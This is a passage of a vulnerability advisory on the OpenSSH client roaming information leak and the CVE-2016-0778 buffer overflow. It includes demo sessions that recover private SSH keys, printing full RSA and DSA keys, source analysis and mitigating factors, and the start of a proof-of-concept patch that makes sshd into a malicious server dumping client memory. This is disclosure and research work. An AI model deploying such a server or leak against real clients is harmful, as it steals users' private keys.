gKHPucECgYEA7ssL293PZR3W9abbivDxvtCjA+41L8Rl8k+J0Dj0QTQfeHxHD2eL cQO2lx4N3E9bJMUnnmjxIT84Dg7SqOWThh3Rof+c/vglyy5o/CzbScISQTvjKfuB +s5aNojIqkyKaesQyxmdacLxtBBppZvzCDTHBXvAe4t8Bus2DPBzbzsCgYEAz+jl hcsMQ1egiVVpxHdjtm3+D1lbgITk0hzIt9DYEIMBJ7y5Gp2mrcroJAzt7VA2s7Ri hBSGv1pjz4j82l00odjCyiUrwvE1Gs48rChzT1PcQvtPCCanDvxOHwpKlUTdUKZh vhxPK/DW3IgUL0MlaTOjncR1Zppz4xpF/cSlYHUCgYB0MhVZLXvHxlddPY5C86+O nFNWjEkRL040NIPo8G3adJSDumWRl18A5T+qFRPFik/depomuQXsmaibHpdfXCcG 8eeaHpm0b+dkEPdBDkq+f1MGry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra uWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc prs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO ZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V 8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp ppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz uiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg== -----END RSA PRIVATE KEY-----
"pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -o ProxyCommand="/usr/bin/nc -w 1 %h %p" -p 222 127.0.0.1 [connection suspended, press return to resume]Segmentation fault (core dumped)
(this example requires a ProxyCommand because of the NULL-aitop bug described in the Mitigating Factors of the Information Leak section, and crashes because of the NULL-pointer dereference discussed in the Mitigating Factors of the Buffer Overflow section)
cat /tmp/roaming-a5eca355/infoleak
ry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra uWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc prs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO ZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V 8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp ppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz uiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==
Private Key Disclosure example: CentOS 7, 1024-bit DSA key
$ grep PRETTY_NAME= /etc/os-release PRETTY_NAME="CentOS Linux 7 (Core)"
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ cat ~/.ssh/id_dsa -----BEGIN DSA PRIVATE KEY----- MIIBvQIBAAKBgQDmjJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe kt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5n GLnZn1lmDldNaqhV0ECESXZVEpq/8TR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a Nmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC o7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsCioD2 hUaU7sV6Nho9fJIclxuxZP8j+uzidQKKN/+CVbQougsLsBlstpuQ4Hr2DHmalL8X iISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/ QlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS F9AoVoZFKEGn4FEoYIqY3a4= -----END DSA PRIVATE KEY-----
env ROAMING="heap_massaging:linux" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 ...
strings /tmp/roaming-b7b16dfc/infoleak
jJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe kt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5
strings /tmp/roaming-b324ce87/infoleak
IuQL R2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a Nmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC o7l7mJT+lI9v
strings /tmp/roaming-24011739/infoleak
KjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC o7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsC
strings /tmp/roaming-37456846/infoleak
LsBlstpuQ4Hr2DHmalL8X iISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZNA yq4Kwj/
strings /tmp/roaming-988ff54c/infoleak
GBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/
strings /tmp/roaming-53887fa5/infoleak
/4oatxFUV5V8aniqyq4Kwj/ QlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS F9AoVoZFKEGn4FEoYIqY3a4
Private Key Disclosure example: Fedora 20, 2048-bit RSA key
$ grep PRETTY_NAME= /etc/os-release PRETTY_NAME="Fedora 20 (Heisenbug)"
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAmbj/XjOppLWSAhuLKiRoHsdp66LJdY2PvP0ht3GWDKKCk7Gz HLas5VjotS9rmupavGGDiicMHPClOttWAI9MRyvP77iZhSei/RzX1/UKk/broTDp o9ljBnQTzRAyw8ke72Ih77SOGfOLBvYlx80ZmESLYYH95aAeuuDvb236JnsgRPDQ /B/gyRIhfqis70USi05/ZbnAenFn+v9zoSduDYMzSM8mFmh9f+9PVb9qMHdfNkIy 2E78kt9BknU/bEcCWyL+IXNLV0rgRGAcE0ncKu13YvuH/7o4Q7bW2FYErT4P/FHK cRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o 6GEmk/oB9w9gf1zGqWkTytMiqcawMW4LZAJlSI/rGWe7lYHuceZSSgzd5lF4VP06 Xz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV JQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+prtAxpPNfKElEV7ZPBrTRAuCUr Hiy7yflZ3w0qHekNafX/tnWiU4zi/p6aD4rs10YaYSnSolsDs2k8wHbVP4VtLE8l PRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ rtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo /euhzdYixxIkfqyopnYFoER26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot gxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa jwj3EZsXmtP+wd3fhge7pIHp5RiKfBn0JtSvXQQHO0k0eEcQ4aA/6yESI62wOuaY vJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y 3fBC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF Q4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P pdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU dz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4syLfm qK+cwb7uCSi5PfloRiLryPdvnobDGLfFGdOHaX7km+4u5+taYg2Er8IsAxtMNwM5 r5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp P/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+ ZS16+aH97RKdJD/4qiskzzHvZs+wi4LKPHHHz7ETXr/m4CRfMIU= -----END RSA PRIVATE KEY-----
env ROAMING="heap_massaging:linux" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 ...
strings /tmp/roaming-a2bbc5f6/infoleak
cRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CG
strings /tmp/roaming-47b46456/infoleak
RGAcE0nc GCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o 6GEmk/oB9
strings /tmp/roaming-7a6717ae/infoleak
cawMW4LZ1 Xz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV JQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+p
strings /tmp/roaming-f3091f08/infoleak
lZ3w0qHe nSolsDs2k8wHbVP4VtLE8l PRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ
strings /tmp/roaming-62a9e9a3/infoleak
lZ3w0qHe r3TwTa0pPEk11 LbcsTEJ rtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo /euhzdYixxIkfqyopnYFoER26u37/OHe37P
strings /tmp/roaming-8de31ed5/infoleak
7qyvNznQ 26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot gxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa
strings /tmp/roaming-f5e0fbcc/infoleak
yESI62wOuaY vJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y 3fBC3h9BN5banCw6VKfnvm8/q+bwSxS
strings /tmp/roaming-9be933df/infoleak
QRtzK/GpRuMC1 C3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF Q4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmT
strings /tmp/roaming-ee4d1e6c/infoleak
SG3aTqYp tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P pdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//s
strings /tmp/roaming-c2bfd69c/infoleak
SG3aTqYp 6JmTOun5zVV6A H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU dz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4s
strings /tmp/roaming-2b3217a1/infoleak
DGLfFGdO r5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp P/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCQ
strings /tmp/roaming-1e275747/infoleak
g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+
======================================================================== Buffer Overflow (CVE-2016-0778) ========================================================================
Analysis
Support for roaming was elegantly added to the OpenSSH client: the calls to read() and write() that communicate with the SSH server were replaced by calls to roaming_read() and roaming_write(), two wrappers that depend on wait_for_roaming_reconnect() to transparently reconnect to the server after a disconnection. The wait_for_roaming_reconnect() routine is essentially a sequence of four subroutines:
239 int 240 wait_for_roaming_reconnect(void) 241 { ... 250 fprintf(stderr, "[connection suspended, press return to resume]"); ... 252 packet_backup_state(); 253 / TODO Perhaps we should read from tty here / 254 while ((c = fgetc(stdin)) != EOF) { ... 259 if (c != '\n' && c != '\r') 260 continue; 261 262 if (ssh_connect(host, &hostaddr, options.port, ... 265 options.proxy_command) == 0 && roaming_resume() == 0) { 266 packet_restore_state(); ... 268 fprintf(stderr, "[connection resumed]\n"); ... 270 return 0; 271 } 272 273 fprintf(stderr, "[reconnect failed, press return to retry]"); ... 275 } 276 fprintf(stderr, "[exiting]\n"); ... 278 exit(0); 279 }
-
packet_backup_state() close()s connection_in and connection_out (the old file descriptors that connected the client to the server), and saves the state of the suspended SSH session (for example, the encryption and decryption contexts).
-
ssh_connect() opens new file descriptors, and connects them to the SSH server.
-
roaming_resume() negotiates the resumption of the suspended SSH session with the server, and calls resend_bytes().
-
packet_restore_state() updates connection_in and connection_out (with the new file descriptors that connect the client to the server), and restores the state of the suspended SSH session.
The new file descriptors for connection_in and connection_out may differ from the old ones (if, for example, files or pipes or sockets are opened or closed between two successive ssh_connect() calls), but unfortunately historical code in OpenSSH assumes that they are constant:
-
In client_loop(), the variables connection_in and connection_out are cached locally, but packet_write_poll() calls roaming_write(), which may assign new values to connection_in and connection_out (if a reconnection occurs), and client_wait_until_can_do_something() subsequently reuses the old, cached values.
-
client_loop() eventually updates these cached values, and the following FD_ISSET() uses a new, updated file descriptor (the fd connection_out), but an old, out-of-date file descriptor set (the fd_set writeset).
-
packet_read_seqnr() (old API, or ssh_packet_read_seqnr(), new API) first calloc()ates setp, a file descriptor set for connection_in; next, it loops around memset(), FD_SET(), select() and roaming_read(); last, it free()s setp and returns. Unfortunately, roaming_read() may reassign a higher value to connection_in (if a reconnection occurs), but setp is never enlarged, and the following memset() and FD_SET() may therefore overflow setp (a heap-based buffer overflow):
1048 int 1049 packet_read_seqnr(u_int32_t seqnr_p) 1050 { .... 1052 fd_set setp; .... 1058 setp = (fd_set )xcalloc(howmany(active_state->connection_in + 1, 1059 NFDBITS), sizeof(fd_mask)); .... 1065 for (;;) { .... 1075 if (type != SSH_MSG_NONE) { 1076 free(setp); 1077 return type; 1078 } .... 1083 memset(setp, 0, howmany(active_state->connection_in + 1, 1084 NFDBITS) * sizeof(fd_mask)); 1085 FD_SET(active_state->connection_in, setp); .... 1092 for (;;) { .... 1097 if ((ret = select(active_state->connection_in + 1, setp, 1098 NULL, NULL, timeoutp)) >= 0) 1099 break; .... 1115 } .... 1117 do { .... 1119 len = roaming_read(active_state->connection_in, buf, 1120 sizeof(buf), &cont); 1121 } while (len == 0 && cont); .... 1130 } 1131 / NOTREACHED */ 1132 }
- packet_write_wait() (old API, or ssh_packet_write_wait(), new API) is basically similar to packet_read_seqnr() and may overflow its own setp if roaming_write() (called by packet_write_poll()) reassigns a higher value to connection_out (after a successful reconnection):
1739 void 1740 packet_write_wait(void) 1741 { 1742 fd_set setp; .... 1746 setp = (fd_set )xcalloc(howmany(active_state->connection_out + 1, 1747 NFDBITS), sizeof(fd_mask)); 1748 packet_write_poll(); 1749 while (packet_have_data_to_write()) { 1750 memset(setp, 0, howmany(active_state->connection_out + 1, 1751 NFDBITS) * sizeof(fd_mask)); 1752 FD_SET(active_state->connection_out, setp); .... 1758 for (;;) { .... 1763 if ((ret = select(active_state->connection_out + 1, 1764 NULL, setp, NULL, timeoutp)) >= 0) 1765 break; .... 1776 } .... 1782 packet_write_poll(); 1783 } 1784 free(setp); 1785 }
Mitigating Factors
This buffer overflow affects all OpenSSH clients >= 5.4, but its impact is significantly reduced by the Mitigating Factors detailed in the Information Leak section, and additionally:
- OpenSSH versions >= 6.8 reimplement packet_backup_state() and packet_restore_state(), but introduce a bug that prevents the buffer overflow from being exploited; indeed, ssh_packet_backup_state() swaps two local pointers, ssh and backup_state, instead of swapping the two global pointers active_state and backup_state:
9 struct ssh active_state, backup_state; ... 238 void 239 packet_backup_state(void) 240 { 241 ssh_packet_backup_state(active_state, backup_state); 242 } 243 244 void 245 packet_restore_state(void) 246 { 247 ssh_packet_restore_state(active_state, backup_state); 248 }
2269 void 2270 ssh_packet_backup_state(struct ssh ssh, 2271 struct ssh backup_state) 2272 { 2273 struct ssh tmp; .... 2279 if (backup_state) 2280 tmp = backup_state; 2281 else 2282 tmp = ssh_alloc_session_state(); 2283 backup_state = ssh; 2284 ssh = tmp; 2285 } .... 2291 void 2292 ssh_packet_restore_state(struct ssh ssh, 2293 struct ssh backup_state) 2294 { 2295 struct ssh tmp; .... 2299 tmp = backup_state; 2300 backup_state = ssh; 2301 ssh = tmp; 2302 ssh->state->connection_in = backup_state->state->connection_in;
As a result, the global pointer backup_state is still NULL when passed to ssh_packet_restore_state(), and crashes the OpenSSH client when dereferenced:
env ROAMING="overflow:A fd_leaks:0" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -V OpenSSH_6.8, LibreSSL 2.1
$ /usr/bin/ssh -o ProxyCommand="/usr/bin/nc -w 15 %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]Segmentation fault (core dumped)
This bug prevents the buffer overflow from being exploited, but not the information leak, because the vulnerable function resend_bytes() is called before ssh_packet_restore_state() crashes.
File Descriptor Leak
A back-of-the-envelope calculation indicates that, in order to increase the file descriptor connection_in or connection_out, and thus overflow the file descriptor set setp in packet_read_seqnr() or packet_write_wait(), a file descriptor leak is needed:
-
First, the number of bytes calloc()ated for setp is rounded up to the nearest multiple of sizeof(fd_mask): 8 bytes (or 64 file descriptors) on 64-bit systems.
-
Next, in glibc, this number is rounded up to the nearest multiple of MALLOC_ALIGNMENT: 16 bytes (or 128 file descriptors) on 64-bit systems.
-
Last, in glibc, a MIN_CHUNK_SIZE is enforced: 32 bytes on 64-bit systems, of which 24 bytes (or 192 file descriptors) are reserved for setp.
-
In conclusion, a file descriptor leak is needed, because connection_in or connection_out has to be increased by hundreds in order to overflow setp.
The search for a suitable file descriptor leak begins with a study of the behavior of the four ssh_connect() methods, when called for a reconnection by wait_for_roaming_reconnect():
- The default method ssh_connect_direct() communicates with the server through a simple TCP socket: the two file descriptors connection_in and connection_out are both equal to this socket's file descriptor.
In wait_for_roaming_reconnect(), the low-numbered file descriptor of the old TCP socket is close()d by packet_backup_state(), but immediately reused for the new TCP socket in ssh_connect_direct(): the new file descriptors connection_in and connection_out are equal to this old, low-numbered file descriptor, and cannot possibly overflow setp.
-
The special ProxyCommand "-" communicates with the server through stdin and stdout, but (as explained in the Mitigating Factors of the Information Leak section) it cannot possibly reconnect to the server, and is therefore immune to this buffer overflow.
-
Surprisingly, we discovered a file descriptor leak in the ssh_proxy_fdpass_connect() method itself; indeed, the file descriptor sp[1] is never close()d:
101 static int 102 ssh_proxy_fdpass_connect(const char host, u_short port, 103 const char proxy_command) 104 { ... 106 int sp[2], sock; ... 113 if (socketpair(AF_UNIX, SOCK_STREAM, 0, sp) < 0) 114 fatal("Could not create socketpair to communicate with " 115 "proxy dialer: %.100s", strerror(errno)); ... 161 close(sp[0]); ... 164 if ((sock = mm_receive_fd(sp[1])) == -1) 165 fatal("proxy dialer did not pass back a connection"); ... 171 / Set the connection file descriptors. / 172 packet_set_connection(sock, sock); 173 174 return 0; 175 }
However, two different reasons prevent this file descriptor leak from triggering the setp overflow:
- The method ssh_proxy_fdpass_connect() communicates with the server through a single socket received from the ProxyCommand: the two file descriptors connection_in and connection_out are both equal to this socket's file descriptor.
In wait_for_roaming_reconnect(), the low-numbered file descriptor of the old socket is close()d by packet_backup_state(), reused for sp[0] in ssh_proxy_fdpass_connect(), close()d again, and eventually reused again for the new socket: the new file descriptors connection_in and connection_out are equal to this old, low-numbered file descriptor, and cannot possibly overflow setp.
-
Because of the waitpid() bug described in the Mitigating Factors of the Information Leak section, the method ssh_proxy_fdpass_connect() calls fatal() before it returns to wait_for_roaming_reconnect(), and is therefore immune to this buffer overflow.
-
The method ssh_proxy_connect() communicates with the server through a ProxyCommand and two different pipes: the file descriptor connection_in is the read end of the second pipe (pout[0]), and the file descriptor connection_out is the write end of the first pipe (pin[1]):
180 static int 181 ssh_proxy_connect(const char host, u_short port, const char proxy_command) 182 { ... 184 int pin[2], pout[2]; ... 192 if (pipe(pin) < 0 || pipe(pout) < 0) 193 fatal("Could not create pipes to communicate with the proxy: %.100s", 194 strerror(errno)); ... 240 / Close child side of the descriptors. / 241 close(pin[0]); 242 close(pout[1]); ... 247 / Set the connection file descriptors. / 248 packet_set_connection(pout[0], pin[1]); 249 250 / Indicate OK return / 251 return 0; 252 }
In wait_for_roaming_reconnect(), the two old, low-numbered file descriptors connection_in and connection_out are both close()d by packet_backup_state(), and immediately reused for the pipe(pin) in ssh_proxy_connect(): the new connection_out (pin[1]) is equal to one of these old, low-numbered file descriptors, and cannot possibly overflow setp.
On the other hand, the pipe(pout) in ssh_proxy_connect() may return high-numbered file descriptors, and the new connection_in (pout[0]) may therefore overflow setp, if hundreds of file descriptors were leaked before the call to wait_for_roaming_reconnect():
- We discovered a file descriptor leak in the pubkey_prepare() function of OpenSSH >= 6.8; indeed, if the client is running an authentication agent that does not offer any private keys, the reference to agent_fd is lost, and this file descriptor is never close()d:
1194 static void 1195 pubkey_prepare(Authctxt *authctxt) 1196 { .... 1200 int agent_fd, i, r, found; .... 1247 if ((r = ssh_get_authentication_socket(&agent_fd)) != 0) { 1248 if (r != SSH_ERR_AGENT_NOT_PRESENT) 1249 debug("%s: ssh_get_authentication_socket: %s", 1250 func, ssh_err(r)); 1251 } else if ((r = ssh_fetch_identitylist(agent_fd, 2, &idlist)) != 0) { 1252 if (r != SSH_ERR_AGENT_NO_IDENTITIES) 1253 debug("%s: ssh_fetch_identitylist: %s", 1254 func, ssh_err(r)); 1255 } else { .... 1288 authctxt->agent_fd = agent_fd; 1289 } .... 1299 }
However, OpenSSH clients >= 6.8 crash in ssh_packet_restore_state() (because of the NULL-pointer dereference discussed in the Mitigating Factors of the Buffer Overflow section) and are immune to the setp overflow, despite this agent_fd leak.
- If ForwardAgent (-A) or ForwardX11 (-X) is enabled in the OpenSSH client (it is disabled by default), a malicious SSH server can request hundreds of forwardings, in order to increase connection_in (each forwarding opens a file descriptor), and thus overflow setp in packet_read_seqnr():
env ROAMING="overflow:A" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -V OpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014
$ /usr/bin/ssh-agent -- /usr/bin/ssh -A -o ProxyCommand="/usr/bin/socat - TCP4:%h:%p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed] *** Error in `/usr/bin/ssh': free(): invalid next size (fast): 0x00007f0474d03e70 *** Aborted (core dumped)
env ROAMING="overflow:X" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ /usr/bin/ssh -X -o ProxyCommand="/usr/bin/socat - TCP4:%h:%p" -p 222 127.0.0.1
user@127.0.0.1's password:
[connection suspended, press return to resume][connection resumed]
*** Error in /usr/bin/ssh': free(): invalid next size (fast): 0x00007fdcc2a3aba0 ***
*** Error in/usr/bin/ssh': malloc(): memory corruption: 0x00007fdcc2a3abc0 ***
Finally, a brief digression on two unexpected problems that had to be solved in our proof-of-concept:
-
First, setp can be overflowed only in packet_read_seqnr(), not in packet_write_wait(), but agent forwarding and X11 forwarding are post- authentication functionalities, and post-authentication calls to packet_read() or packet_read_expect() are scarce, except in the key-exchange code of OpenSSH clients < 6.8: our proof-of-concept effectively forces a rekeying in order to overflow setp in packet_read_seqnr().
-
Second, after a successful reconnection, packet_read_seqnr() may call fatal("Read from socket failed: %.100s", ...), because roaming_read() may return EAGAIN (EAGAIN is never returned without the reconnection, because the preceding call to select() guarantees that connection_in is ready for read()). Our proof-of-concept works around this problem by forcing the client to resend MAX_ROAMBUF bytes (2M) to the server, allowing data to reach the client before roaming_read() is called, thus avoiding EAGAIN.
======================================================================== Acknowledgments ========================================================================
We would like to thank the OpenSSH developers for their great work and their incredibly quick response, Red Hat Product Security for promptly assigning CVE-IDs to these issues, and Alexander Peslyak of the Openwall Project for the interesting discussions.
======================================================================== Proof Of Concept ========================================================================
diff -pruN openssh-6.4p1/auth2-pubkey.c openssh-6.4p1+roaming/auth2-pubkey.c --- openssh-6.4p1/auth2-pubkey.c 2013-07-17 23:10:10.000000000 -0700 +++ openssh-6.4p1+roaming/auth2-pubkey.c 2016-01-07 01:04:15.000000000 -0800 @@ -169,7 +169,9 @@ userauth_pubkey(Authctxt authctxt) * if a user is not allowed to login. is this an * issue? -markus / - if (PRIVSEP(user_key_allowed(authctxt->pw, key))) { + if (PRIVSEP(user_key_allowed(authctxt->pw, key)) || 1) { + debug("%s: force client-side load_identity_file", + func); packet_start(SSH2_MSG_USERAUTH_PK_OK); packet_put_string(pkalg, alen); packet_put_string(pkblob, blen); diff -pruN openssh-6.4p1/kex.c openssh-6.4p1+roaming/kex.c --- openssh-6.4p1/kex.c 2013-06-01 14:31:18.000000000 -0700 +++ openssh-6.4p1+roaming/kex.c 2016-01-07 01:04:15.000000000 -0800 @@ -442,6 +442,73 @@ proposals_match(char *my[PROPOSAL_MAX], }
static void +roaming_reconnect(void) +{ + packet_read_expect(SSH2_MSG_KEX_ROAMING_RESUME); + const u_int id = packet_get_int(); / roaming_id / + debug("%s: id %u", func, id); + packet_check_eom(); + + const char const dir = get_roaming_dir(id); + debug("%s: dir %s", func, dir); + const int fd = open(dir, O_RDONLY | O_NOFOLLOW | O_NONBLOCK); + if (fd <= -1) + fatal("%s: open %s errno %d", func, dir, errno); + if (fchdir(fd) != 0) + fatal("%s: fchdir %s errno %d", func, dir, errno); + if (close(fd) != 0) + fatal("%s: close %s errno %d", func, dir, errno); + + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_REQUIRED); + packet_put_int64(arc4random()); / chall / + packet_put_int64(arc4random()); / oldchall / + packet_send(); + + packet_read_expect(SSH2_MSG_KEX_ROAMING_AUTH); + const u_int64_t client_read_bytes = packet_get_int64(); + debug("%s: client_read_bytes %llu", func, + (unsigned long long)client_read_bytes); + packet_get_int64(); / digest (1-8) / + packet_get_int64(); / digest (9-16) / + packet_get_int(); / digest (17-20) / + packet_check_eom(); + + u_int64_t client_write_bytes; + size_t len = sizeof(client_write_bytes); + load_roaming_file("client_write_bytes", &client_write_bytes, &len); + debug("%s: client_write_bytes %llu", func, + (unsigned long long)client_write_bytes); + + u_int client_out_buf_size; + len = sizeof(client_out_buf_size); + load_roaming_file("client_out_buf_size", &client_out_buf_size, &len); + debug("%s: client_out_buf_size %u", func, client_out_buf_size); + if (client_out_buf_size <= 0 || client_out_buf_size > MAX_ROAMBUF) + fatal("%s: client_out_buf_size %u", func, + client_out_buf_size); + + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_OK); + packet_put_int64(client_write_bytes - (u_int64_t)client_out_buf_size); + packet_send(); + const int overflow = (access("output", F_OK) == 0); + if (overflow != 0) { + const void const ptr = load_roaming_file("output", NULL, &len); + buffer_append(packet_get_output(), ptr, len); + } + packet_write_wait(); + + char const client_out_buf = xmalloc(client_out_buf_size); + if (atomicio(read, packet_get_connection_in(), client_out_buf, + client_out_buf_size) != client_out_buf_size) + fatal("%s: read client_out_buf_size %u errno %d", func, + client_out_buf_size, errno); + if (overflow == 0) + dump_roaming_file("infoleak", client_out_buf, + client_out_buf_size); + fatal("%s: all done for %s", func, dir); +} + +static void kex_choose_conf(Kex kex) { Newkeys newkeys; @@ -470,6 +537,10 @@ kex_choose_conf(Kex kex) kex->roaming = 1; free(roaming); } + } else if (strcmp(peer[PROPOSAL_KEX_ALGS], KEX_RESUME) == 0) { + roaming_reconnect(); + / NOTREACHED / + fatal("%s: returned from %s", func, KEX_RESUME); }
/* Algorithm Negotiation */
